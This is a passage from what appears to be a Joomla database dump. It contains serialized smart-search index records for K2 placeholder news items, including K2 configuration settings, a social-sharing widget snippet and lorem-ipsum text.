class=\'st_googleplus_vcount\' displayText=\'+1\'></span>\r\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'></span>\r\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'></span>\r\n<span class=\'st_email_vcount\' displayText=\'Email\'></span>\r\n<span class=\'st_sharethis_vcount\' displayText=\'ShareThis\'></span>\r\n</div>\";s:15:\"twitterUsername\";s:0:\"\";s:13:\"facebookImage\";s:6:\"Medium\";s:8:\"comments\";s:1:\"1\";s:16:\"commentsOrdering\";s:4:\"DESC\";s:13:\"commentsLimit\";s:2:\"10\";s:20:\"commentsFormPosition\";s:5:\"below\";s:18:\"commentsPublishing\";s:1:\"1\";s:17:\"commentsReporting\";s:1:\"2\";s:23:\"commentsReportRecipient\";s:0:\"\";s:24:\"inlineCommentsModeration\";s:1:\"0\";s:8:\"gravatar\";s:1:\"1\";s:8:\"antispam\";s:1:\"0\";s:22:\"recaptchaForRegistered\";s:1:\"1\";s:20:\"akismetForRegistered\";s:1:\"1\";s:17:\"commentsFormNotes\";s:1:\"1\";s:21:\"commentsFormNotesText\";s:0:\"\";s:15:\"frontendEditing\";s:1:\"1\";s:12:\"showImageTab\";s:1:\"1\";s:19:\"showImageGalleryTab\";s:1:\"1\";s:12:\"showVideoTab\";s:1:\"1\";s:18:\"showExtraFieldsTab\";s:1:\"1\";s:18:\"showAttachmentsTab\";s:1:\"1\";s:13:\"showK2Plugins\";s:1:\"1\";s:22:\"sideBarDisplayFrontend\";s:1:\"0\";s:12:\"mergeEditors\";s:1:\"1\";s:14:\"sideBarDisplay\";s:1:\"1\";s:17:\"attachmentsFolder\";s:0:\"\";s:16:\"hideImportButton\";s:1:\"1\";s:12:\"googleSearch\";s:1:\"0\";s:21:\"googleSearchContainer\";s:23:\"k2GoogleSearchContainer\";s:13:\"K2UserProfile\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:11:\"adminSearch\";s:6:\"simple\";s:12:\"cookieDomain\";s:0:\"\";s:13:\"taggingSystem\";s:1:\"1\";s:8:\"lockTags\";s:1:\"0\";s:13:\"showTagFilter\";s:1:\"0\";s:9:\"k2TagNorm\";s:1:\"0\";s:13:\"k2TagNormCase\";s:5:\"lower\";s:31:\"k2TagNormAdditionalReplacements\";s:0:\"\";s:20:\"recaptcha_public_key\";s:0:\"\";s:21:\"recaptcha_private_key\";s:0:\"\";s:15:\"recaptcha_theme\";s:5:\"clean\";s:23:\"recaptchaOnRegistration\";s:1:\"0\";s:13:\"akismetApiKey\";s:0:\"\";s:13:\"stopForumSpam\";s:1:\"0\";s:19:\"stopForumSpamApiKey\";s:0:\"\";s:21:\"showItemsCounterAdmin\";s:1:\"1\";s:17:\"showChildCatItems\";s:1:\"1\";s:22:\"disableCompactOrdering\";s:1:\"0\";s:13:\"metaDescLimit\";s:3:\"150\";s:22:\"enforceSEFReplacements\";s:1:\"0\";s:15:\"SEFReplacements\";s:2768:\"À|A, Á|A, Â|A, Ã|A, Ä|A, Å|A, à|a, á|a, â|a, ã|a, ä|a, å|a, Ā|A, ā|a, Ă|A, ă|a, Ą|A, ą|a, Ç|C, ç|c, Ć|C, ć|c, Ĉ|C, ĉ|c, Ċ|C, ċ|c, Č|C, č|c, Ð|D, ð|d, Ď|D, ď|d, Đ|D, đ|d, È|E, É|E, Ê|E, Ë|E, è|e, é|e, ê|e, ë|e, Ē|E, ē|e, Ĕ|E, ĕ|e, Ė|E, ė|e, Ę|E, ę|e, Ě|E, ě|e, Ĝ|G, ĝ|g, Ğ|G, ğ|g, Ġ|G, ġ|g, Ģ|G, ģ|g, Ĥ|H, ĥ|h, Ħ|H, ħ|h, Ì|I, Í|I, Î|I, Ï|I, ì|i, í|i, î|i, ï|i, Ĩ|I, ĩ|i, Ī|I, ī|i, Ĭ|I, ĭ|i, Į|I, į|i, İ|I, ı|i, Ĵ|J, ĵ|j, Ķ|K, ķ|k, ĸ|k, Ĺ|L, ĺ|l, Ļ|L, ļ|l, Ľ|L, ľ|l, Ŀ|L, ŀ|l, Ł|L, ł|l, Ñ|N, ñ|n, Ń|N, ń|n, Ņ|N, ņ|n, Ň|N, ň|n, ŉ|n, Ŋ|N, ŋ|n, Ò|O, Ó|O, Ô|O, Õ|O, Ö|O, Ø|O, ò|o, ó|o, ô|o, õ|o, ö|o, ø|o, Ō|O, ō|o, Ŏ|O, ŏ|o, Ő|O, ő|o, Ŕ|R, ŕ|r, Ŗ|R, ŗ|r, Ř|R, ř|r, Ś|S, ś|s, Ŝ|S, ŝ|s, Ş|S, ş|s, Š|S, š|s, ſ|s, Ţ|T, ţ|t, Ť|T, ť|t, Ŧ|T, ŧ|t, Ù|U, Ú|U, Û|U, Ü|U, ù|u, ú|u, û|u, ü|u, Ũ|U, ũ|u, Ū|U, ū|u, Ŭ|U, ŭ|u, Ů|U, ů|u, Ű|U, ű|u, Ų|U, ų|u, Ŵ|W, ŵ|w, Ý|Y, ý|y, ÿ|y, Ŷ|Y, ŷ|y, Ÿ|Y, Ź|Z, ź|z, Ż|Z, ż|z, Ž|Z, ž|z, α|a, β|b, γ|g, δ|d, ε|e, ζ|z, η|h, θ|th, ι|i, κ|k, λ|l, μ|m, ν|n, ξ|x, ο|o, π|p, ρ|r, σ|s, τ|t, υ|y, φ|f, χ|ch, ψ|ps, ω|w, Α|A, Β|B, Γ|G, Δ|D, Ε|E, Ζ|Z, Η|H, Θ|Th, Ι|I, Κ|K, Λ|L, Μ|M, Ξ|X, Ο|O, Π|P, Ρ|R, Σ|S, Τ|T, Υ|Y, Φ|F, Χ|Ch, Ψ|Ps, Ω|W, ά|a, έ|e, ή|h, ί|i, ό|o, ύ|y, ώ|w, Ά|A, Έ|E, Ή|H, Ί|I, Ό|O, Ύ|Y, Ώ|W, ϊ|i, ΐ|i, ϋ|y, ς|s, А|A, Ӑ|A, Ӓ|A, Ә|E, Ӛ|E, Ӕ|E, Б|B, В|V, Г|G, Ґ|G, Ѓ|G, Ғ|G, Ӷ|G, y|Y, Д|D, Е|E, Ѐ|E, Ё|YO, Ӗ|E, Ҽ|E, Ҿ|E, Є|YE, Ж|ZH, Ӂ|DZH, Җ|ZH, Ӝ|DZH, З|Z, Ҙ|Z, Ӟ|DZ, Ӡ|DZ, Ѕ|DZ, И|I, Ѝ|I, Ӥ|I, Ӣ|I, І|I, Ї|JI, Ӏ|I, Й|Y, Ҋ|Y, Ј|J, К|K, Қ|Q, Ҟ|Q, Ҡ|K, Ӄ|Q, Ҝ|K, Л|L, Ӆ|L, Љ|L, М|M, Ӎ|M, Н|N, Ӊ|N, Ң|N, Ӈ|N, Ҥ|N, Њ|N, О|O, Ӧ|O, Ө|O, Ӫ|O, Ҩ|O, П|P, Ҧ|PF, Р|P, Ҏ|P, С|S, Ҫ|S, Т|T, Ҭ|TH, Ћ|T, Ќ|K, У|U, Ў|U, Ӳ|U, Ӱ|U, Ӯ|U, Ү|U, Ұ|U, Ф|F, Х|H, Ҳ|H, Һ|H, Ц|TS, Ҵ|TS, Ч|CH, Ӵ|CH, Ҷ|CH, Ӌ|CH, Ҹ|CH, Џ|DZ, Ш|SH, Щ|SHT, Ъ|A, Ы|Y, Ӹ|Y, Ь|Y, Ҍ|Y, Э|E, Ӭ|E, Ю|YU, Я|YA, а|a, ӑ|a, ӓ|a, ә|e, ӛ|e, ӕ|e, б|b, в|v, г|g, ґ|g, ѓ|g, ғ|g, ӷ|g, y|y, д|d, е|e, ѐ|e, ё|yo, ӗ|e, ҽ|e, ҿ|e, є|ye, ж|zh, ӂ|dzh, җ|zh, ӝ|dzh, з|z, ҙ|z, ӟ|dz, ӡ|dz, ѕ|dz, и|i, ѝ|i, ӥ|i, ӣ|i, і|i, ї|ji, Ӏ|i, й|y, ҋ|y, ј|j, к|k, қ|q, ҟ|q, ҡ|k, ӄ|q, ҝ|k, л|l, ӆ|l, љ|l, м|m, ӎ|m, н|n, ӊ|n, ң|n, ӈ|n, ҥ|n, њ|n, о|o, ӧ|o, ө|o, ӫ|o, ҩ|o, п|p, ҧ|pf, р|p, ҏ|p, с|s, ҫ|s, т|t, ҭ|th, ћ|t, ќ|k, у|u, ў|u, ӳ|u, ӱ|u, ӯ|u, ү|u, ұ|u, ф|f, х|h, ҳ|h, һ|h, ц|ts, ҵ|ts, ч|ch, ӵ|ch, ҷ|ch, ӌ|ch, ҹ|ch, џ|dz, ш|sh, щ|sht, ъ|a, ы|y, ӹ|y, ь|y, ҍ|y, э|e, ӭ|e, ю|yu, я|ya\";s:5:\"k2Sef\";s:1:\"0\";s:13:\"k2SefLabelCat\";s:7:\"content\";s:13:\"k2SefLabelTag\";s:3:\"tag\";s:14:\"k2SefLabelUser\";s:6:\"author\";s:16:\"k2SefLabelSearch\";s:6:\"search\";s:14:\"k2SefLabelDate\";s:4:\"date\";s:14:\"k2SefLabelItem\";s:1:\"0\";s:26:\"k2SefLabelItemCustomPrefix\";s:0:\"\";s:17:\"k2SefInsertItemId\";s:1:\"1\";s:24:\"k2SefItemIdTitleAliasSep\";s:4:\"dash\";s:22:\"k2SefUseItemTitleAlias\";s:1:\"1\";s:16:\"k2SefInsertCatId\";s:1:\"1\";s:23:\"k2SefCatIdTitleAliasSep\";s:4:\"dash\";s:21:\"k2SefUseCatTitleAlias\";s:1:\"1\";s:16:\"sh404SefLabelCat\";s:0:\"\";s:17:\"sh404SefLabelUser\";s:4:\"blog\";s:17:\"sh404SefLabelItem\";s:1:\"2\";s:18:\"sh404SefTitleAlias\";s:5:\"alias\";s:29:\"sh404SefModK2ContentFeedAlias\";s:4:\"feed\";s:20:\"sh404SefInsertItemId\";s:1:\"0\";s:26:\"sh404SefInsertUniqueItemId\";s:1:\"0\";s:13:\"cbIntegration\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";}}s:8:\"ordering\";s:1:\"1\";s:5:\"trash\";s:1:\"1\";s:9:\"cat_trash\";s:1:\"0\";s:8:\"category\";s:11:\"Latest News\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:22:\"1:latest-news-analysis\";s:7:\"catslug\";s:13:\"1:latest-news\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:4:\"item\";s:4:\"path\";s:56:\"index.php/lankytini-objektai/item/1-latest-news-analysis\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"K2 Item\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"K2 Item\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:11:\"K2 Category\";a:1:{s:11:\"Latest News\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:11:\"Latest News\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:38:\"index.php?option=com_k2&view=item&id=1\";s:5:\"route\";s:70:\"index.php?option=com_k2&view=item&id=1:latest-news-analysis&Itemid=290\";s:5:\"title\";s:33:\"Fall Career Fair set for Sept. 25\";s:11:\"description\";s:543:\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2013-09-24 06:16:44\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-09-24 06:16:44\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;}'),(3,'index.php?option=com_k2&view=item&id=2','index.php?option=com_k2&view=item&id=2:a-night-of-dido-drama-and-dinner-nsectetur-adipisicing-elit-sed-do-eiusmod-tempor&Itemid=290','A night of Dido, drama, and dinner nsectetur adipisicing elit, sed do eiusmod tempor.','Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea c','2025-02-12 13:16:37','7007c430c340cc0711a5227bb4837080',1,1,1,'*','2013-09-25 00:00:00','0000-00-00 00:00:00','2013-10-04 00:00:00','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":18:{s:11:\"\0*\0elements\";a:25:{s:2:\"id\";s:1:\"2\";s:5:\"alias\";s:81:\"a-night-of-dido-drama-and-dinner-nsectetur-adipisicing-elit-sed-do-eiusmod-tempor\";s:7:\"summary\";s:550:\"<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:1:\"1\";s:10:\"created_by\";s:3:\"135\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2013-10-07 09:13:36\";s:11:\"modified_by\";s:3:\"135\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":155:{s:10:\"enable_css\";s:1:\"1\";s:14:\"jQueryHandling\";s:5:\"1.8.3\";s:21:\"backendJQueryHandling\";s:6:\"remote\";s:8:\"userName\";s:1:\"1\";s:9:\"userImage\";s:1:\"1\";s:15:\"userDescription\";s:1:\"1\";s:7:\"userURL\";s:1:\"1\";s:9:\"userEmail\";s:1:\"0\";s:12:\"userFeedLink\";s:1:\"1\";s:12:\"userFeedIcon\";s:1:\"1\";s:13:\"userItemCount\";s:2:\"10\";s:13:\"userItemTitle\";s:1:\"1\";s:19:\"userItemTitleLinked\";s:1:\"1\";s:19:\"userItemDateCreated\";s:1:\"1\";s:13:\"userItemImage\";s:1:\"1\";s:17:\"userItemIntroText\";s:1:\"1\";s:16:\"userItemCategory\";s:1:\"1\";s:12:\"userItemTags\";s:1:\"1\";s:22:\"userItemCommentsAnchor\";s:1:\"1\";s:16:\"userItemReadMore\";s:1:\"1\";s:17:\"userItemK2Plugins\";s:1:\"1\";s:12:\"tagItemCount\";s:2:\"10\";s:12:\"tagItemTitle\";s:1:\"1\";s:18:\"tagItemTitleLinked\";s:1:\"1\";s:18:\"tagItemDateCreated\";s:1:\"1\";s:12:\"tagItemImage\";s:1:\"1\";s:16:\"tagItemIntroText\";s:1:\"1\";s:15:\"tagItemCategory\";s:1:\"1\";s:15:\"tagItemReadMore\";s:1:\"1\";s:18:\"tagItemExtraFields\";s:1:\"0\";s:11:\"tagOrdering\";s:0:\"\";s:11:\"tagFeedLink\";s:1:\"1\";s:11:\"tagFeedIcon\";s:1:\"1\";s:16:\"genericItemCount\";s:2:\"10\";s:16:\"genericItemTitle\";s:1:\"1\";s:22:\"genericItemTitleLinked\";s:1:\"1\";s:22:\"genericItemDateCreated\";s:1:\"1\";s:16:\"genericItemImage\";s:1:\"1\";s:20:\"genericItemIntroText\";s:1:\"1\";s:19:\"genericItemCategory\";s:1:\"1\";s:19:\"genericItemReadMore\";s:1:\"1\";s:22:\"genericItemExtraFields\";s:1:\"0\";s:15:\"genericFeedLink\";s:1:\"1\";s:15:\"genericFeedIcon\";s:1:\"1\";s:9:\"feedLimit\";s:2:\"10\";s:13:\"feedItemImage\";s:1:\"1\";s:11:\"feedImgSize\";s:1:\"S\";s:17:\"feedItemIntroText\";s:1:\"1\";s:17:\"feedTextWordLimit\";s:0:\"\";s:16:\"feedItemFullText\";s:1:\"1\";s:12:\"feedItemTags\";s:1:\"0\";s:13:\"feedItemVideo\";s:1:\"0\";s:15:\"feedItemGallery\";s:1:\"0\";s:19:\"feedItemAttachments\";s:1:\"0\";s:14:\"feedBogusEmail\";s:0:\"\";s:16:\"introTextCleanup\";s:1:\"0\";s:27:\"introTextCleanupExcludeTags\";s:0:\"\";s:23:\"introTextCleanupTagAttr\";s:0:\"\";s:15:\"fullTextCleanup\";s:1:\"0\";s:26:\"fullTextCleanupExcludeTags\";s:0:\"\";s:22:\"fullTextCleanupTagAttr\";s:0:\"\";s:12:\"xssFiltering\";s:1:\"0\";s:14:\"linkPopupWidth\";s:3:\"900\";s:15:\"linkPopupHeight\";s:3:\"600\";s:13:\"imagesQuality\";s:3:\"100\";s:11:\"itemImageXS\";s:3:\"100\";s:10:\"itemImageS\";s:3:\"200\";s:10:\"itemImageM\";s:3:\"400\";s:10:\"itemImageL\";s:3:\"870\";s:11:\"itemImageXL\";s:3:\"900\";s:16:\"itemImageGeneric\";s:3:\"350\";s:13:\"catImageWidth\";s:3:\"100\";s:15:\"catImageDefault\";s:1:\"1\";s:14:\"userImageWidth\";s:3:\"100\";s:16:\"userImageDefault\";s:1:\"1\";s:17:\"commenterImgWidth\";s:2:\"48\";s:17:\"onlineImageEditor\";s:8:\"splashup\";s:14:\"imageTimestamp\";s:1:\"0\";s:16:\"imageMemoryLimit\";s:0:\"\";s:16:\"socialButtonCode\";s:708:\"<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script>\r\n<script type=\"text/javascript\">stLight.options({publisher: \"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\"}); </script>\r\n\r\n<div style=\"padding:20px 0\" class=\"social-share\">\r\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'></span>\r\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'></span>\r\n<span class=\'st_googleplus_vcount\' displayText=\'+1\'></span>\r\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'></span>\r\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'></span>\r\n<span class=\'st_email_vcount\' displayText=\'Email\'></span>\r\n<span class=\'st_sharethis_vcount\' displayText=\'ShareThis\'></span>\r\n</div>\";s:15:\"twitterUsername\";s:0:\"\";s:13:\"facebookImage\";s:6:\"Medium\";s:8:\"comments\";s:1:\"1\";s:16:\"commentsOrdering\";s:4:\"DESC\";s:13:\"commentsLimit\";s:2:\"10\";s:20:\"commentsFormPosition\";s:5:\"below\";s:18:\"commentsPublishing\";s:1:\"1\";s:17:\"commentsReporting\";s:1:\"2\";s:23:\"commentsReportRecipient\";s:0:\"\";s:24:\"inlineCommentsModeration\";s:1:\"0\";s:8:\"gravatar\";s:1:\"1\";s:8:\"antispam\";s:1:\"0\";s:22:\"recaptchaForRegistered\";s:1:\"1\";s:20:\"akismetForRegistered\";s:1:\"1\";s:17:\"commentsFormNotes\";s:1:\"1\";s:21:\"commentsFormNotesText\";s:0:\"\";s:15:\"frontendEditing\";s:1:\"1\";s:12:\"showImageTab\";s:1:\"1\";s:19:\"showImageGalleryTab\";s:1:\"1\";s:12:\"showVideoTab\";s:1:\"1\";s:18:\"showExtraFieldsTab\";s:1:\"1\";s:18:\"showAttachmentsTab\";s:1:\"1\";s:13:\"showK2Plugins\";s:1:\"1\";s:22:\"sideBarDisplayFrontend\";s:1:\"0\";s:12:\"mergeEditors\";s:1:\"1\";s:14:\"sideBarDisplay\";s:1:\"1\";s:17:\"attachmentsFolder\";s:0:\"\";s:16:\"hideImportButton\";s:1:\"1\";s:12:\"googleSearch\";s:1:\"0\";s:21:\"googleSearchContainer\";s:23:\"k2GoogleSearchContainer\";s:13:\"K2UserProfile\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:11:\"adminSearch\";s:6:\"simple\";s:12:\"cookieDomain\";s:0:\"\";s:13:\"taggingSystem\";s:1:\"1\";s:8:\"lockTags\";s:1:\"0\";s:13:\"showTagFilter\";s:1:\"0\";s:9:\"k2TagNorm\";s:1:\"0\";s:13:\"k2TagNormCase\";s:5:\"lower\";s:31:\"k2TagNormAdditionalReplacements\";s:0:\"\";s:20:\"recaptcha_public_key\";s:0:\"\";s:21:\"recaptcha_private_key\";s:0:\"\";s:15:\"recaptcha_theme\";s:5:\"clean\";s:23:\"recaptchaOnRegistration\";s:1:\"0\";s:13:\"akismetApiKey\";s:0:\"\";s:13:\"stopForumSpam\";s:1:\"0\";s:19:\"stopForumSpamApiKey\";s:0:\"\";s:21:\"showItemsCounterAdmin\";s:1:\"1\";s:17:\"showChildCatItems\";s:1:\"1\";s:22:\"disableCompactOrdering\";s:1:\"0\";s:13:\"metaDescLimit\";s:3:\"150\";s:22:\"enforceSEFReplacements\";s:1:\"0\";s:15:\"SEFReplacements\";s:2768:\"À|A, Á|A, Â|A, Ã|A, Ä|A, Å|A, à|a, á|a, â|a, ã|a, ä|a, å|a, Ā|A, ā|a, Ă|A, ă|a, Ą|A, ą|a, Ç|C, ç|c, Ć|C, ć|c, Ĉ|C, ĉ|c, Ċ|C, ċ|c, Č|C, č|c, Ð|D, ð|d, Ď|D, ď|d, Đ|D, đ|d, È|E, É|E, Ê|E, Ë|E, è|e, é|e, ê|e, ë|e, Ē|E, ē|e, Ĕ|E, ĕ|e, Ė|E, ė|e, Ę|E, ę|e, Ě|E, ě|e, Ĝ|G, ĝ|g, Ğ|G, ğ|g, Ġ|G, ġ|g, Ģ|G, ģ|g, Ĥ|H, ĥ|h, Ħ|H, ħ|h, Ì|I, Í|I, Î|I, Ï|I, ì|i, í|i, î|i, ï|i, Ĩ|I, ĩ|i, Ī|I, ī|i, Ĭ|I, ĭ|i, Į|I, į|i, İ|I, ı|i, Ĵ|J, ĵ|j, Ķ|K, ķ|k, ĸ|k, Ĺ|L, ĺ|l, Ļ|L, ļ|l, Ľ|L, ľ|l, Ŀ|L, ŀ|l, Ł|L, ł|l, Ñ|N, ñ|n, Ń|N, ń|n, Ņ|N, ņ|n, Ň|N, ň|n, ŉ|n, Ŋ|N, ŋ|n, Ò|O, Ó|O, Ô|O, Õ|O, Ö|O, Ø|O, ò|o, ó|o, ô|o, õ|o, ö|o, ø|o, Ō|O, ō|o, Ŏ|O, ŏ|o, Ő|O, ő|o, Ŕ|R, ŕ|r, Ŗ|R, ŗ|r, Ř|R, ř|r, Ś|S, ś|s, Ŝ|S, ŝ|s, Ş|S, ş|s, Š|S, š|s, ſ|s, Ţ|T, ţ|t, Ť|T, ť|t, Ŧ|T, ŧ|t, Ù|U, Ú|U, Û|U, Ü|U, ù|u, ú|u, û|u, ü|u, Ũ|U, ũ|u, Ū|U, ū|u, Ŭ|U, ŭ|u, Ů|U, ů|u, Ű|U, ű|u, Ų|U, ų|u, Ŵ|W, ŵ|w, Ý|Y, ý|y, ÿ|y, Ŷ|Y, ŷ|y, Ÿ|Y, Ź|Z, ź|z, Ż|Z, ż|z, Ž|Z, ž|z, α|a, β|b, γ|g, δ|d, ε|e, ζ|z, η|h, θ|th, ι|i, κ|k, λ|l, μ|m, ν|n, ξ|x, ο|o, π|p, ρ|r, σ|s, τ|t, υ|y, φ|f, χ|ch, ψ|ps, ω|w, Α|A, Β|B, Γ|G, Δ|D, Ε|E, Ζ|Z, Η|H, Θ|Th, Ι|I, Κ|K, Λ|L, Μ|M, Ξ|X, Ο|O, Π|P, Ρ|R, Σ|S, Τ|T, Υ|Y, Φ|F, Χ|Ch, Ψ|Ps, Ω|W, ά|a, έ|e, ή|h, ί|i, ό|o, ύ|y, ώ|w, Ά|A, Έ|E, Ή|H, Ί|I, Ό|O, Ύ|Y, Ώ|W, ϊ|i, ΐ|i, ϋ|y, ς|s, А|A, Ӑ|A, Ӓ|A, Ә|E, Ӛ|E, Ӕ|E, Б|B, В|V, Г|G, Ґ|G, Ѓ|G, Ғ|G, Ӷ|G, y|Y, Д|D, Е|E, Ѐ|E, Ё|YO, Ӗ|E, Ҽ|E, Ҿ|E, Є|YE, Ж|ZH, Ӂ|DZH, Җ|ZH, Ӝ|DZH, З|Z, Ҙ|Z, Ӟ|DZ, Ӡ|DZ, Ѕ|DZ, И|I, Ѝ|I, Ӥ|I, Ӣ|I, І|I, Ї|JI, Ӏ|I, Й|Y, Ҋ|Y, Ј|J, К|K, Қ|Q, Ҟ|Q, Ҡ|K, Ӄ|Q, Ҝ|K, Л|L, Ӆ|L, Љ|L, М|M, Ӎ|M, Н|N, Ӊ|N, Ң|N, Ӈ|N, Ҥ|N, Њ|N, О|O, Ӧ|O, Ө|O, Ӫ|O, Ҩ|O, П|P, Ҧ|PF, Р|P, Ҏ|P, С|S, Ҫ|S, Т|T, Ҭ|TH, Ћ|T, Ќ|K, У|U, Ў|U, Ӳ|U, Ӱ|U, Ӯ|U, Ү|U, Ұ|U, Ф|F, Х|H, Ҳ|H, Һ|H, Ц|TS, Ҵ|TS, Ч|CH, Ӵ|CH, Ҷ|CH, Ӌ|CH, Ҹ|CH, Џ|DZ, Ш|SH, Щ|SHT, Ъ|A, Ы|Y, Ӹ|Y, Ь|Y, Ҍ|Y, Э|E, Ӭ|E, Ю|YU, Я|YA, а|a, ӑ|a, ӓ|a, ә|e, ӛ|e, ӕ|e, б|b, в|v, г|g, ґ|g, ѓ|g, ғ|g, ӷ|g, y|y, д|d, е|e, ѐ|e, ё|yo, ӗ|e, ҽ|e, ҿ|e, є|ye, ж|zh, ӂ|dzh, җ|zh, ӝ|dzh, з|z, ҙ|z, ӟ|dz, ӡ|dz, ѕ|dz, и|i, ѝ|i, ӥ|i, ӣ|i, і|i, ї|ji, Ӏ|i, й|y, ҋ|y, ј|j, к|k, қ|q, ҟ|q, ҡ|k, ӄ|q, ҝ|k, л|l, ӆ|l, љ|l, м|m, ӎ|m, н|n, ӊ|n, ң|n, ӈ|n, ҥ|n, њ|n, о|o, ӧ|o, ө|o, ӫ|o, ҩ|o, п|p, ҧ|pf, р|p, ҏ|p, с|s, ҫ|s, т|t, ҭ|th, ћ|t, ќ|k, у|u, ў|u, ӳ|u, ӱ|u, ӯ|u, ү|u, ұ|u, ф|f, х|h, ҳ|h, һ|h, ц|ts, ҵ|ts, ч|ch, ӵ|ch, ҷ|ch, ӌ|ch, ҹ|ch, џ|dz, ш|sh, щ|sht, ъ|a, ы|y, ӹ|y, ь|y, ҍ|y, э|e, ӭ|e, ю|yu, я|ya\";s:5:\"k2Sef\";s:1:\"0\";s:13:\"k2SefLabelCat\";s:7:\"content\";s:13:\"k2SefLabelTag\";s:3:\"tag\";s:14:\"k2SefLabelUser\";s:6:\"author\";s:16:\"k2SefLabelSearch\";s:6:\"search\";s:14:\"k2SefLabelDate\";s:4:\"date\";s:14:\"k2SefLabelItem\";s:1:\"0\";s:26:\"k2SefLabelItemCustomPrefix\";s:0:\"\";s:17:\"k2SefInsertItemId\";s:1:\"1\";s:24:\"k2SefItemIdTitleAliasSep\";s:4:\"dash\";s:22:\"k2SefUseItemTitleAlias\";s:1:\"1\";s:16:\"k2SefInsertCatId\";s:1:\"1\";s:23:\"k2SefCatIdTitleAliasSep\";s:4:\"dash\";s:21:\"k2SefUseCatTitleAlias\";s:1:\"1\";s:16:\"sh404SefLabelCat\";s:0:\"\";s:17:\"sh404SefLabelUser\";s:4:\"blog\";s:17:\"sh404SefLabelItem\";s:1:\"2\";s:18:\"sh404SefTitleAlias\";s:5:\"alias\";s:29:\"sh404SefModK2ContentFeedAlias\";s:4:\"feed\";s:20:\"sh404SefInsertItemId\";s:1:\"0\";s:26:\"sh404SefInsertUniqueItemId\";s:1:\"0\";s:13:\"cbIntegration\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";}}s:8:\"ordering\";s:1:\"2\";s:5:\"trash\";s:1:\"1\";s:9:\"cat_trash\";s:1:\"0\";s:8:\"category\";s:11:\"Latest 